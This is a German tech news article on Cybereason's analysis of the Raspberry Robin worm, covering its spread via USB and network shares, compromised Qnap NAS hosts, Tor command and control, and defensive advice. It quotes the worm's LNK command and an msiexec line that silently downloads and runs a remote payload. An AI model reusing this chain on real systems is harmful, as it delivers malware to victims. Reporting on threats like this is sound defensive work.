Forscher vom IT-Sicherheitsunternehmen Cybereason haben eine Malware-Kampagne mit einem Computerwurm entdeckt, der Windows- und Qnap-Netzwerkspeicher-Geräte befällt. Er ist Teil der Malware-Kampagne namens Raspberry Robin, die Malware wird aber auch als LNK Worm bezeichnet. Raspberry Robin umfasst einen Wurm, der mittels USB-Geräten oder Netzwerkfreigaben Verbreitung findet. Er nutzt kompromittierte Qnap-NAS-Geräte als Sprungbrett. Zum Einsatz kommt die alte, aber immer noch effektive Methode, mit LNK-Shortcut-Dateien auf Opfer zu lauern. Die Raspberry-Robin-Infektion beginnt mit zwei Dateien, die im gleichen Verzeichnis auf einem externen Gerät oder einer Netzwerkfreigabe liegen: Einer LNK-Datei, die einen Windows-Befehl enthält, sowie einer als .bat-Datei funktionierenden Datei, die aus Fülldaten und zwei speziellen Befehlen besteht. Im konkreten Beispiel enthält die .lnk-Datei den Aufruf C:\Windows\System32\cmd.exe" /r tYPE xPhfK.Usb|CmD
, während die Datei xPhfK.Usb
neben zufälligen Binärdaten zwei Befehle explorer.exe ADATA uFD
und mSIExEC /Q -I"hTTP://<Adresse>:8080/<Verzeichnis>/USER-PC?admin"
zum Herunterladen und Ausführen der Malware enthielt. Der auf dem Rechner bereits vorhandene msiexec
-Installer (sogenanntes „Living of the Land“, LOL) dient dazu, eine bösartige DLL-Bibliothek von einem kompromittierten NAS-Gerät von Qnap herunterzuladen und auszuführen. Um die Erkennung zu erschweren, nutzt Raspberry Robin Prozess-Injektion in drei legitime Windows-Prozesse und kommuniziert mit den Command-and-Control-Servern durch das anonymisierende Tor-Netzwerk. Persistenz erreicht die Malware durch das Anlegen eines Registry-Schlüssels, der die DLL-Datei mittels rundll32.exe
beim Systemstart lädt und ausführt. Die Bibliothek imitiert im untersuchten Fall eine Apache-DLL namens libapriconv-1.dll
, um keinen Verdacht zu erregen. Andere Infektionen nutzten Cybereason zufolge auch eine Verkleidung als QT 5. Zum Schutz vor Malware-Befall kann eine Antiviren-Software dienen. Cybereason liefert weitere Hinweise, wie einem Befall vorzubeugen respektive nach einem Befall vorzugehen ist. So sollten IT-Verantwortliche ausgehende Verbindungen zu Tor-bezogenen Adressen blockieren, da Raspberry Robin aktiv mit Tor-Exit-Nodes kommuniziere. Kam es doch zu einem Befall, sollten die betroffenen Maschinen mit einem Image neu aufgesetzt werden, da die Malware sich einnistet und Mechanismen zum Verstecken auf infizierten Systemen nutze. Weitere Details enthält die Meldung von Cybereason.